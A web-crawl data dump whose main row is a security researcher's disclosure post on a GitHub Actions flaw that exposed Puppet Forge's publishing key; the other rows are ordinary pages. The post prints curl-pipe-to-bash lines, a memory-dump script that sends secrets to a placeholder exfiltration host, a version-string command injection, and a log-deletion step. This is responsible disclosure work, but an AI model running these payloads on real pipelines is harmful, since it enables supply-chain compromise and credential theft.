url stringlengths 11 2.25k | text stringlengths 88 50k | ts timestamp[s]date 2026-01-13 08:47:33 2026-01-13 09:30:40 |
|---|---|---|
https://adnanthekhan.com/2024/07/02/roguepuppet-a-critical-puppet-forge-supply-chain-vulnerability/ | RoguePuppet - A Critical Puppet Forge Supply Chain Vulnerability | Adnan Khan - Security Research Adnan Khan's Blog Post Archive About Talks Search ⌘ K ESC Start typing to search posts... Search across titles, content, and tags No results found Try different keywords or check your spelling ↑ ↓ to navigate ↵ to select Powered by Fuse.js Post Archive About Talks RoguePuppet - A Critical Puppet Forge Supply Chain Vulnerability July 2, 2024 11 min read adnanthekhan cicd githubactions security supplychain Enter the Nightmare What if there was a supply chain attack that could provide an attacker with direct access to core infrastructure within thousands of companies worldwide. What if that attack required no social engineering and could be executed within a few hours ? Between April 2nd, 2024 and May 21st, 2024 that attack would have been possible, and the only prerequisite would be signing up for an account on GitHub. What is this supply chain attack? It is the ability to add malware to every single official Puppet Forge module. Puppet Gone Rogue This attack would have been possible due to a systemic GitHub Actions CI/CD misconfiguration within Puppet Lab’s public GitHub repositories. The vulnerability allowed anyone with a GitHub Account to obtain the API key Puppet used to push official modules to Puppet Forge . The only actions an attacker would need to do is create a pull request, issue a few API calls, and quietly close their pull request minutes later. What is Puppet? Puppet is an infrastructure-as-code service that is used by companies to automate maintenance and provisioning of infrastructure. It is predominantly used by large companies and government organizations with significant on-premise infrastructure. Many of Puppet’s featured customers are within the healthcare, financial services, and critical infrastructure industries. These organizations are prime targets for ransomware groups. Impact With the API key, an attacker could choose to quickly backdoor a single module with the hope of flying under the radar, or go for an all out approach whereby they simultaneously backdoor major modules in hopes of quickly catching targets before someone notices. Either outcome would be a global cyber disaster and could cause billions in economic damage at worst and a forced exercise of disaster recovery procedures at best. Thankfully, I Found it First I discovered this vulnerability using a tool that I have been developing to detect GitHub Actions misconfigurations at scale, Gato-X. I’ve identified vulnerabilities in companies like Microsoft, NVIDIA, and more. If you want to see how Gato-X processed the puppetlabs organization, take a look here ! To confirm the impact, I executed a proof of concept to demonstrate I could push to Puppet Forge and then reported the vulnerability to Puppet. Puppet mitigated the vulnerability the following day and revoked the API token. Over the following weeks, Puppet Labs fixed the vulnerability in dozens of repositories and added a new API token to repositories. What is Puppet Forge? Puppet Forge is a package repository for Puppet Modules, similar to NPM or PyPi. It contains modules officially supported by Puppet along with third-party modules. What is unique about Forge modules is that each runs in the context of Puppet deployments. Imagine being able to drop malware directly onto the production infrastructure of 80% of the Global 5000 (according to Puppet’s Sales pitch). This vulnerability allowed Anyone with a GitHub Account to directly push updated Puppet Forge packages! I would have been able to push updates to packages such as https://forge.puppet.com/modules/puppetlabs/accounts . Unlike Pypi or NPM, these are not downloaded on individual developer machines. The vast majority of downloads come from DevOps infrastructure of Puppet users around the world. If an attacker were to backdoor the top 5-10 modules, within hours systems that do not pin a specific version would begin to use the packages as part of Puppet deployment jobs. Furthermore, the module itself informs what a malicious payload would need to do and how to blend in with noise. Updating a database? Misconfigure it. Adding accounts? Add another and configure a cron job for it to beacon to C2. This would fly by Puppet Forge’s malware check, which is a VirusTotal scan. Vulnerability and Proof of Concept This vulnerability was trivial to exploit, and that is what made it so scary. All it required was creating a pull request and 5 minutes of time. The vulnerability was introduced in April, 2024 alongside a series of changes to Puppet Labs repositories changing the pull_request trigger to pull_request_target . If you are familiar with GitHub Actions attacks, workflows that run on pull_request_target have access to secrets, a GITHUB_TOKEN with write access, and run in the context of the target branch. Pull request approvals also do not apply to workflows on the pull_request_targe t trigger. Initial Workflow name : "mend" on : pull_request_target : types : - opened - synchronize schedule : - cron : "0 0 * * *" workflow_dispatch : jobs : mend : uses : "puppetlabs/cat-github-actions/.github/workflows/mend_ruby.yml@main" secrets : "inherit" The initial workflow references a secondary workflow. In GitHub Actions workflows can reference a reusable workflow as part of a job. This is often how Pwn Request vulnerabilities slip through security reviews. The typical guidance for pull_request_target is to never check out and run code from pull requests. In this case, the checkout operation happened in the referenced workflow, which itself does not have the pull_request_target trigger. Called Workflow The referenced workflow will retrieve the PR head sha if the trigger is pull_request_target , and then proceed to check out the code from the PR head. It doesn’t immediately appear that the workflow is executing code, but after close observation I noticed a call to bundle lock . Bundle will execute any system commands within Gemfiles if they are present. This allows running arbitrary code within the context of the called workflow. # If we are on a PR, checkout the PR head sha, else checkout the default branch - name : "Set the checkout ref" if : success() id : set_ref run : | if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT else echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT fi - name : "checkout" if : success() uses : "actions/checkout@v4" with : fetch-depth : 1 ref : ${{ steps.set_ref.outputs.ref }} - name : "setup ruby" if : success() uses : "ruby/setup-ruby@v1" with : ruby-version : 2.7 - name : "bundle lock" if : success() run : bundle lock To make matters worse, the workflow used default GITHUB_TOKEN permissions. This was unfortunate, because the workflow did not require write permissions at all. It has access to a MEND_TOKEN secret, which is used to upload vulnerability scanning results, but that would have been the extent of the impact. Lack of least privilege configurations turned a Low-risk Information Disclosure vulnerability into a Critical Hack-The-Planet vulnerability. To obtain the GITHUB_TOKEN , all an attacker had to do was add the following line to the Gemfile and create a pull request. system ( "curl -sSfL gist.githubusercontent.com/yourUser/c5a17987fb26abe0827f3db6364155cf/raw/27cc63c043da2339e120ffeffc4de8cd8fb9039a/test1.sh | bash && exit 1" ) # Replace with Burp collaborator domain or similar. YOUR_EXFIL = "your-exfil-domain.com" # Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN) if [[ " $OSTYPE " == "linux-gnu" ]]; then B64_BLOB = ` curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 ` # Exfil to Burp curl -s -d " $B64_BLOB " https:// $YOUR_EXFIL /token > /dev/null # Sleep for 15 mins to abuse GITHUB_TOKEN sleep 900 else exit 0 fi Ok, so now that I have a GITHUB_TOKEN with write access, how can I get the FORGE_API_KEY? The key was used as the last step in the release workflow, so I needed a way to run arbitrary code within the workflow to retrieve the secret from the runner’s memory. Initially, I thought there was no way to run arbitrary code, and that the impact would be from an attacker triggering a real release. Still impactful, but the attack would be louder and have to be executed for each module. Each attempt would provide another opportunity for detection. It turned out, there was a path… Let’s take a look at https://github.com/puppetlabs/puppetlabs-sqlserver/blob/main/.github/workflows/release.yml . That workflow ran on workflow_dispatch and proceeded to call https://github.com/puppetlabs/cat-github-actions/blob/main/.github/workflows/module_release.yml as a reusable workflow. You can find the workflow as it existed when I performed my PoC here . The workflow didn’t run any code directly (it ran the build command in a container), but it did read a tag from the metadata.json file and saves it to an environment variable. That environment variable is saved to tag , and set as part of the GITHUB_OUTPUT . - name : "Get metadata" id : metadata run : | metadata_version=$(jq --raw-output .version metadata.json) if [[ -n "${{ inputs.tag }}" ]] ; then tag=${{ inputs.tag }} if [[ "${metadata_version}" != "${tag/v}" ]] ; then echo "::error::tag ${tag/v} does not match metadata version ${metadata_version}" exit 1 fi else tag="v${metadata_version}" fi echo "tag=${tag}" >> $GITHUB_OUTPUT echo "version=${metadata_version}" >> $GITHUB_OUTPUT Next, a subsequent step referenced that environment variable by context expression. Bingo! - name: "Tag ${{ steps.metadata.outputs.tag }}" id: tag run: | # create an annotated tag -- gh release create DOES NOT do this for us! # TODO move this to an automatic action when a release_prep PR is merged git config --local user.email "${{ github.repository_owner }}@users.noreply.github.com" git config --local user.name "GitHub Actions" # overwrite existing tag? if [[ -n "${{ inputs.tag }}" ]] ; then if [[ "${{ inputs.edit }}" == "true" ]] ; then arg="-f" else skip_tag=1 fi fi if [[ -z "${skip_tag}" ]] ; then GIT_COMMITTER_DATE="$(git log --format=%aD ...HEAD^)" git tag -a $arg -F OUTPUT.md "${{ steps.metadata.outputs.tag }}" git push $arg origin tag "${{ steps.metadata.outputs.tag }}" fi This meant that I could bounce off of the metadata.json file to run arbitrary code and then exit (I most certainly did not want to push a release here!). I added the same payload I used earlier to the version. "version" : "5.0.2 \" ; curl -sSfL gist.githubusercontent.com/RampagingSloth/d6e6aff904c19ed50709063af53cca61/raw/f3505c21360c9adc11ca9e8d 557a386661115809/test.sh | bash && exit 1 && echo \" Foo" Next, I used the captured GITHUB_TOKEN to push a feature branch to the puppetlabs/puppetlabs-sqlserver repository with the modified metadata.json file. After pushing the branch, I issued a dispatch event to that feature branch. The dispatch event triggered the release workflow. curl -L \ -X POST \ -H "Accept: application/vnd.github+json" \ -H "Authorization: Bearer $CAPTURED_TOKEN " \ -H "X-GitHub-Api-Version: 2022-11-28" \ https://api.github.com/repos/puppetlabs/puppetlabs-sqlserver/actions/workflows/release.yml/dispatches \ -d '{"ref":"test"}' A few seconds later, I received the FORGE_API_KEY at my Burp Collaborator URL: After that, I used the GITHUB_TOKEN to clear run logs of workflows I triggered using GitHub’s API to delete workflow runs . To conclude my PoC, I created a fork of the https://github.com/puppetlabs/xzscanner repository and added the Forge API token to it as a GitHub Actions secret. The Xzscanner module is a Puppet module to scan for backdoored versions of Xz within infrastructure. It was also not widely used and was marked as an unofficial module, so I decided to use it to prove that I could backdoor a tool used to find backdoors. Within my fork I modified the README and executed the release workflow. This was the moment of truth - if the release worked, then it would mean that the API key is global. The workflow pushed a change directly to Puppet Forge. Since my initial pull request was on puppetlabs-sqlserver and I was able to push to xzscanner using the API key, this proved that: The FORGE_API_TOKEN was the same for all repositories. The token could push to all Puppet Forge releases published by the puppetlabs user. The xzscanner 0.1.2 release showing the README modification. Disclosure Timeline May 20th, 2024 - Disclosed Vulnerability to Puppet Labs May 21st, 2024 - Puppet Labs Begins Fixing Repositories May 22nd, 2024 - Puppet revokes API token and removes the 0.1.2 release of the xzscanner module. This mitigated the vulnerability as even if someone were to exploit it, they would obtain the old API token which would not be able to push to Puppet Forge. June 3rd, 2024 - Informed Puppet of intent to publish a blog post once the vulnerability is fully mitigated. June 6th, 2024 - Puppet finishes all workflow fixes, including removing vulnerable workflows from stale branches. June 12th-June 18th, 2024 - Submitted draft of blog post to Puppet and correspondence about requested edits and feedback from Puppet. July 2nd, 2024 - Blog post publication. I appreciate Puppet Labs taking the report very seriously, rapidly mitigating the vulnerability, and diligently applying fixes to dozens of repositories in a short period of time. Conclusion Generally speaking, these “forced supply chain attacks” are a big blind spot for the industry. GitHub has very informative posts about the risks, but you have to look for them. In the hands of even a remotely capable attacker this vulnerability could have caused extreme damage around the world. When combining ease of exploitation, breadth of impact, and the chance a threat actor would succeed, this is by far the worst Public Poisoned Pipeline Execution vulnerability I have ever discovered. It is shocking that this vulnerability made it into dozens of Puppet Labs repositories in the first place, but when you look at the GitHub CI/CD configuration of most companies it is not surprising. Companies often do not pay enough attention to CI/CD security, as it is not considered customer facing, but these systems often have a direct line to customer impact. Time and time again researchers like myself and others identify the same issues, the bugs are fixed (sometimes, sometimes they come back months later), but the vulnerability class remains. CI/CD attacks have some of the most shocking impacts I’ve seen for how easy they are to exploit, and it is only a matter of time before a threat actor finds and triggers a “supply chain atomic weapon” before a researcher is able to find it. Stay Tuned for Gato-X I will be presenting at Black Hat 24 and DEF CON 32 along with John Stawinski on the topic of GitHub Self-Hosted Runner attacks. As part of the talks, I will be publicly releasing Gato-X (GitHub Attack Toolkit - Extreme), which is a hard fork of Gato . It will include the Pwn Request and Actions Injection detection capabilities I used to discover this vulnerability, in addition to enhanced self-hosted runner attack features. My goal with Gato-X is to bring an end to Actions Injection and Pwn Request vulnerabilities amongst open-source projects as they exist today. Today, bug bounty hunters quickly discover these issues within hours for projects that have a bug bounty program, but there are hundreds of open-source projects where these issues go undiscovered and sit vulnerable for months. Gato-X is also blazing fast at finding these vulnerabilities, and it has a low false negative rate. It scans 35-40 thousand repositories in about one hour running on a laptop with a fast Internet connection. During the scan, it performs reachability analysis for each workflow file it scans and generates priority scores based on that analysis. The tool is not perfect, but it turns 40,000 repos into 3-4 thousand candidates. Of those, 1,500 are medium or high priority, and the results are presented such that users can quickly access the information they need to confirm if the vulnerability is valid or not. I’ve made a lot of money using this tool, but it is time to release it publicly for the good of all. Hackers, let’s find and fix bugs. Gato-X will be available at on my GitHub page the week of Black Hat and DEF CON. References https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution https://docs.github.com/en/actions/using-workflows/reusing-workflows On this page Puppet Gone Rogue What is Puppet? Impact Thankfully, I Found it First Called Workflow Disclosure Timeline Tags: #github #github-actions #security © 2026 Adnan Khan. All rights reserved. | 2026-01-13T09:29:26 |
https://id-id.facebook.com/login/?next=https%3A%2F%2Fl.facebook.com%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.instagram.com%252F%26amp%253Bh%3DAT2FpiAS5Z4gP0BLmRzfuo4BALg9YPzbZ9ghFRCmHt3Onrjp0xwiTLO3A5FDz8P8Zb_hiTX9tVT5JFDef74sOVyazw7vZoOm5R2kajYZw6QBHjevx_fbeeJTebCYVomRxu2_hRi-_Wu4ggdu | Facebook Facebook Email atau telepon Kata Sandi Lupa akun? Buat Akun Baru Anda Diblokir Sementara Anda Diblokir Sementara Sepertinya Anda menyalahgunakan fitur ini dengan menggunakannya terlalu cepat. Anda dilarang menggunakan fitur ini untuk sementara. Back Bahasa Indonesia 한국어 English (US) Tiếng Việt ภาษาไทย Español 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch Daftar Masuk Messenger Facebook Lite Video Meta Pay Meta Store Meta Quest Ray-Ban Meta Meta AI Konten Meta AI lainnya Instagram Threads Pusat Informasi Pemilu Kebijakan Privasi Pusat Privasi Tentang Buat Iklan Buat Halaman Developer Karier Cookie Pilihan Iklan Ketentuan Bantuan Pengunggahan Kontak & Non-Pengguna Pengaturan Log aktivitas Meta © 2026 | 2026-01-13T09:29:26 |
https://www.infoworld.com/cloud-computing/ | Cloud Computing | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Cloud Computing Sponsored by KPMG Cloud Computing Cloud Computing | News, how-tos, features, reviews, and videos Explore related topics Cloud Architecture Cloud Management Cloud Storage Cloud-Native Hybrid Cloud IaaS Managed Cloud Services Multicloud PaaS Private Cloud SaaS Latest from today analysis Which development platforms and tools should you learn now? For software developers, choosing which technologies and skills to master next has never been more difficult. Experts offer their recommendations. By Isaac Sacolick Jan 13, 2026 8 mins Development Tools Devops Generative AI analysis Why hybrid cloud is the future of enterprise platforms By David Linthicum Jan 13, 2026 4 mins Artificial Intelligence Cloud Architecture Hybrid Cloud news Oracle unveils Java development plans for 2026 By Paul Krill Jan 12, 2026 3 mins Java Programming Languages Software Development news AI is causing developers to abandon Stack Overflow By Mikael Markander Jan 12, 2026 2 mins Artificial Intelligence Generative AI Software Development opinion Stack thinking: Why a single AI platform won’t cut it By Tom Popomaronis Jan 12, 2026 8 mins Artificial Intelligence Development Tools Software Development news Postman snaps up Fern to reduce developer friction around API documentation and SDKs By Anirban Ghoshal Jan 12, 2026 3 mins APIs Software Development opinion Why ‘boring’ VS Code keeps winning By Matt Asay Jan 12, 2026 7 mins Developer GitHub Visual Studio Code feature How to succeed with AI-powered, low-code and no-code development tools By Bob Violino Jan 12, 2026 9 mins Development Tools Generative AI No Code and Low Code news Visual Studio Code adds support for agent skills By Paul Krill Jan 9, 2026 3 mins Development Tools Integrated Development Environments Visual Studio Code Articles news analysis Snowflake: Latest news and insights Stay up-to-date on how Snowflake and its underlying architecture has changed how cloud developers, data managers and data scientists approach cloud data management and analytics By Dan Muse Jan 9, 2026 5 mins Cloud Architecture Cloud Computing Cloud Management news Snowflake to acquire Observe to boost observability in AIops The acquisition could position Snowflake as a control plane for production AI, giving CIOs visibility across data, models, and infrastructure without the pricing shock of traditional observability stacks, analysts say. By Anirban Ghoshal Jan 9, 2026 3 mins Artificial Intelligence Software Development feature Python starts 2026 with a bang The world’s most popular programming language kicks off the new year with a wicked-fast type checker, a C code generator, and a second chance for the tail-calling interpreter. By Serdar Yegulalp Jan 9, 2026 2 mins Programming Languages Python Software Development news Microsoft open-sources XAML Studio Forthcoming update of the rapid prototyping tool for WinUI developers, now available on GitHub, adds a new Fluent UI design, folder support, and a live properties panel. By Paul Krill Jan 8, 2026 1 min Development Tools Integrated Development Environments Visual Studio analysis What drives your cloud security strategy? As cloud breaches increase, organizations should prioritize skills and training over the latest tech to address the actual root problems. By David Linthicum Jan 6, 2026 5 mins Careers Cloud Security IT Skills and Training news Databricks says its Instructed Retriever offers better AI answers than RAG in the enterprise Databricks says Instructed Retriever outperforms RAG and could move AI pilots to production faster, but analysts warn it could expose data, governance, and budget gaps that CIOs can’t ignore. By Anirban Ghoshal Jan 8, 2026 5 mins Artificial Intelligence Generative AI opinion The hidden devops crisis that AI workloads are about to expose Devops teams that cling to component-level testing and basic monitoring will struggle to keep pace with the data demands of AI. By Joseph Morais Jan 8, 2026 6 mins Artificial Intelligence Devops Generative AI news AI-built Rue language pairs Rust memory safety with ease of use Developed using Anthropic’s Claude AI model, the new language is intended to provide memory safety without garbage collection while being easier to use than Rust and Zig. By Paul Krill Jan 7, 2026 2 mins Generative AI Programming Languages Rust news Microsoft acquires Osmos to ease data engineering bottlenecks in Fabric The acquisition could help enterprises push analytics and AI projects into production faster while acting as the missing autonomy layer that connects Fabric’s recent enhancements into a coherent system. By Anirban Ghoshal Jan 7, 2026 4 mins Analytics Artificial Intelligence Data Engineering opinion What the loom tells us about AI and coding Like the loom, AI may turn the job market upside down. And enable new technologies and jobs that we simply can’t predict. By Nick Hodges Jan 7, 2026 4 mins Developer Engineer Generative AI analysis Generative UI: The AI agent is the front end In a new model for user interfaces, agents paint the screen with interactive UI components on demand. Let’s take a look. By Matthew Tyson Jan 7, 2026 8 mins Development Tools Generative AI Libraries and Frameworks news AI won’t replace human devs for at least 5 years Progress towards full AI-driven coding automation continues, but in steps rather than leaps, giving organizations time to prepare, according to a new study. By Taryn Plumb Jan 7, 2026 7 mins Artificial Intelligence Developer Roles news Automated data poisoning proposed as a solution for AI theft threat For hackers, the stolen data would be useless, but authorized users would have a secret key that filters out the fake information. By Howard Solomon Jan 7, 2026 6 mins Artificial Intelligence Data Privacy Privacy Show more Show less View all Video on demand video How to generate C-like programs with Python You might be familiar with how Python and C can work together, by way of projects like Cython. The new PythoC project has a unique twist on working with both languages: it lets you write type-decorated Python that can generate entire standalone C programs, not just importable Python libraries written in C. This video shows a few basic PythoC functions, from generating a whole program to using some of PythoC’s typing features to provide better memory management than C alone could. Dec 16, 2025 5 mins Python Zed Editor Review: The Rust-Powered IDE That Might Replace VS Code Dec 3, 2025 5 mins Python Python vs. Kotlin Nov 13, 2025 5 mins Python Hands-on with the new sampling profiler in Python 3.15 Nov 6, 2025 6 mins Python See all videos Explore a topic Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages View all topics All topics Close Browse all topics and categories below. Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages Python Security Software Development Technology Industry Show me more Latest Articles Videos news Ruby 4.0.0 introduces ZJIT compiler, Ruby Box isolation By Paul Krill Jan 6, 2026 3 mins Programming Languages Ruby Software Development news Open WebUI bug turns the ‘free model’ into an enterprise backdoor By Shweta Sharma Jan 6, 2026 3 mins Artificial Intelligence Security Vulnerabilities interview Generative AI and the future of databases By Martin Heller Jan 6, 2026 14 mins Artificial Intelligence Databases Generative AI video How to make local packages universal across Python venvs Nov 4, 2025 4 mins Python video X-ray vision for your async activity in Python 3.14 Oct 21, 2025 4 mins Python video Why it's so hard to redistribute standalone Python apps Oct 17, 2025 5 mins Python About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://foundryco.com/copyright-notice/ | Copyright Infringement Policy and Reporting Guide | Foundry Skip to content Search Contact us Translation available Select an experience Japan Global Search for: Search Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Audiences Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer portal The Intersection newsletter All resources About us Press Awards Work here Privacy / Compliance Licensing About Us Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO 100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer Portal The Intersection newsletter All Resources About us Press Awards Work here Privacy / Compliance Licensing About Us Contact Log in Edition - Select an experience Japan Global FoundryCo, Inc. Copyright Notice FoundryCo, Inc. (“Foundry”) respects the rights of copyright owners. If you believe that your work has been used in a way that constitutes copyright infringement, please contact Foundry by e-mailing foundry.legal@foundryco.com or by sending notice to the address listed below with the following information: A description of the copyrighted work that is allegedly being infringed; Identification of the: (i) copyrighted work(s) being infringed; (ii) the infringing activity; and (iii) the location of the infringing activity (typically by providing the URL); Your contact information, including an email address; A statement that you have a good faith belief that the infringing copyright work(s) is not authorized by the intellectual property or copyright owner, its agent, or the law; and A statement that the information provided is accurate and you are authorized to make the complaint on behalf of the rightful copyright owner; The signature of the copyright owner or its agent, in physical or electronic form. For copyright notices, please contact: Email: foundry.legal@foundryco.com Mail: FoundryCo, Inc. 501 2nd Street, Suite 650 San Francisco California 94107 USA Attn: Legal Department Our brands Solutions Research Resources Events About Newsletter Contact us Work here Sitemap Topics Cookies: First-party & third-party Generative AI sponsorships Intent data IP address intelligence Reverse IP lookup Website visitor tracking Legal Terms of Service Privacy / Compliance Environmental Policy Copyright Notice Licensing CCPA IAB Europe TCF Regions ASEAN Australia & New Zealand Central Europe Germany India Middle East, Turkey, & Africa Nordics Southern Europe Western Europe Facebook Twitter LinkedIn ©2026 FoundryCo, Inc. All Rights Reserved. Privacy Policy Ad Choices Privacy Settings California: Do Not Sell My Information | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/zh_cn/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html | CloudWatch 解决方案:Amazon EC2 上的 JVM 工作负载 - Amazon CloudWatch CloudWatch 解决方案:Amazon EC2 上的 JVM 工作负载 - Amazon CloudWatch 文档 Amazon CloudWatch 用户指南 要求 优势 成本 此解决方案的 CloudWatch 代理配置 为您的解决方案部署代理 创建 JVM 解决方案控制面板 CloudWatch 解决方案:Amazon EC2 上的 JVM 工作负载 此解决方案可帮助您使用 CloudWatch 代理,为在 EC2 实例上运行的 JVM 应用程序配置开箱即用的指标收集。此外,它还可以帮助您设置预配置的 CloudWatch 控制面板。有关所有 CloudWatch 可观测性解决方案的一般信息,请参阅 CloudWatch 可观测性解决方案 。 主题 要求 优势 成本 此解决方案的 CloudWatch 代理配置 为您的解决方案部署代理 创建 JVM 解决方案控制面板 要求 此解决方案适用于以下情况: 支持的版本:Java LTS 版本 8、11、17 和 21 计算:Amazon EC2 在给定的 AWS 区域中跨所有 JVM 工作负载支持最多 500 个 EC2 实例 最新版本的 CloudWatch 代理 EC2 实例上已安装 SSM 代理 注意 AWS Systems Manager(SSM Agent)预装在由 AWS 和受信任的第三方提供的一些 亚马逊机器映像(AMI) 上。如果未安装代理,您可以根据操作系统类型使用程序手动安装。 在适用于 Linux 的 EC2 实例上手动安装和卸载 SSM 代理 在适用于 macOS 的 EC2 实例上手动安装和卸载 SSM 代理 在适用于 Windows Server 的 EC2 实例上手动安装和卸载 SSM 代理 优势 该解决方案提供 JVM 监测,为以下用例提供宝贵的见解: 监测 JVM 堆和非堆内存使用情况。 分析线程和类加载是否存在并发问题。 跟踪垃圾回收以确定内存泄漏。 在同一帐户下通过解决方案配置的不同 JVM 应用程序之间切换。 以下是该解决方案的主要优点: 使用 CloudWatch 代理配置自动收集 JVM 指标,无需手动检测。 为 JVM 指标提供预配置的整合 CloudWatch 控制面板。控制面板将自动处理使用该解决方案配置的新 JVM EC2 实例的指标,即使这些指标在您首次创建控制面板时不存在。它还允许您将指标分组为逻辑应用程序,以便于关注和管理。 下图是此解决方案控制面板的示例。 成本 此解决方案在您的账户中创建和使用资源。您需要为标准使用量付费,包括以下各项: CloudWatch 代理收集的所有指标按自定义指标收费。此解决方案使用的指标数量取决于 EC2 主机的数量。 为解决方案配置的每台 JVM 主机总共发布 18 个指标,外加一个指标( disk_used_percent ),其指标数量取决于主机的路径数量。 一个自定义控制面板。 CloudWatch 代理请求用于发布指标的 API 操作。使用此解决方案的默认配置,CloudWatch 代理每分钟为每台 EC2 主机调用一次 PutMetricData 。这意味着每台 EC2 主机将在 30 天(一个月)内调用 PutMetricData API 30*24*60=43,200 次。 有关 CloudWatch 定价的信息,请参阅 Amazon CloudWatch 定价 。 定价计算器可帮助您估算使用此解决方案的每月大致费用。 使用定价计算器估算每月解决方案成本 打开 Amazon CloudWatch 定价计算器 。 对于 选择区域 ,选择要在其中部署解决方案的区域。 在 指标 部分中,对于 指标数量 ,输入 (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution 。 在 API 部分中,对于 API 请求的数量 ,输入 43200 * number of EC2 instances configured for this solution 。 默认情况下,CloudWatch 代理每分钟为每台 EC2 主机执行一次 PutMetricData 操作。 在 控制面板和警报 部分中,对 控制面板数量 输入 1 。 您可以在定价计算器底部查看每月估算成本。 此解决方案的 CloudWatch 代理配置 CloudWatch 代理是在您的服务器和容器化环境中持续自主运行的软件。它从您的基础设施和应用程序收集指标、日志和跟踪,并将其发送到 CloudWatch 和 X-Ray。 有关 CloudWatch 代理的更多信息,请参阅 使用 CloudWatch 代理采集指标、日志和跟踪数据 。 此解决方案中的代理配置收集解决方案的基础指标。可以将 CloudWatch 代理配置为收集比控制面板默认显示更多的 JVM 指标。有关您可以收集的所有 JVM 指标的列表,请参阅 收集 JVM 指标 。有关 CloudWatch 代理配置的一般信息,请参阅 CloudWatch 代理收集的指标 。 公开 JVM 应用程序的 JMX 端口 CloudWatch 代理依靠 JMX 来收集与 JVM 进程相关的指标。要做到这一点,必须公开 JVM 应用程序的 JMX 端口。公开 JMX 端口的说明取决于您用于 JVM 应用程序的工作负载类型。有关这些说明,请参阅应用程序的文档。 通常,要启用 JMX 端口进行监测和管理,需要为 JVM 应用程序设置以下系统属性。请务必指定未使用的端口号。以下示例设置未经身份验证的 JMX。如果您的安全策略/要求需要使用密码身份验证启用 JMX 或 SSL 进行远程访问,请参阅 JMX 文档 以设置所需的属性。 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false 查看应用程序的起始脚本和配置文件,找到添加这些参数的最佳位置。从命令行运行 .jar 文件时,此命令可能如下所示,其中 pet-search.jar 是应用程序 jar 的名称。 $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar 此解决方案的代理配置 代理收集的指标在代理配置中定义。该解决方案提供代理配置,以收集建议的指标,并为解决方案的控制面板提供合适的维度。 稍后将在 为您的解决方案部署代理 中介绍部署解决方案的步骤。以下信息旨在帮助您了解如何针对环境自定义代理配置。 您必须针对自己的环境自定义以下代理配置的某些部分: JMX 端口号是您在本文档上一节中配置的端口号。它位于配置的 endpoint 行中。 ProcessGroupName :为 ProcessGroupName 维度提供有意义的名称。这些名称应代表运行相同应用程序或进程的 EC2 实例的集群、应用程序或服务分组。这可以帮助您对属于同一 JVM 